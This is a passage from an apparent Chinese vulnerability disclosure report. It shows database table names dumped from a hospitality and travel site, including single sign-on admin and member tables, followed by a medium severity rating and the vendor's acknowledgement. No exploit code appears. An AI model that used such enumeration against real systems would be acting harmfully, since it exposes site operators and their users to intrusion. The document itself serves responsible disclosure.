utf8_news | 1 || utf8_news_data | 1 || utf8_pic_huagang | 1 || utf8_pic_huagang_data | 1 || utf8_poster_201401 | 1 || utf8_poster_201405 | 1 || utf8_repast_tianlinge | 1 || utf8_repast_tianlinge_data | 1 || utf8_repast_xiangguo | 1 || utf8_repast_xiangguo_data | 1 || utf8_spa_huagang | 1 || utf8_spa_huagang_data | 1 || utf8_sso_admin | 1 || utf8_sso_applications | 1 || utf8_sso_members | 1 || utf8_travel_huagang | 1 || utf8_travel_huagang_data | 1 || utf8_travel_jinghan | 1 || utf8_travel_jinghan_data | 1 || utf8_video_o | 1 || utf8_video_o_data | 1 || utf8_wap | 1 |+-----------------------------+---------+
危害等级:中
漏洞Rank:7
确认时间:2015-11-24 20:23
正在处理,非常感谢。
暂无
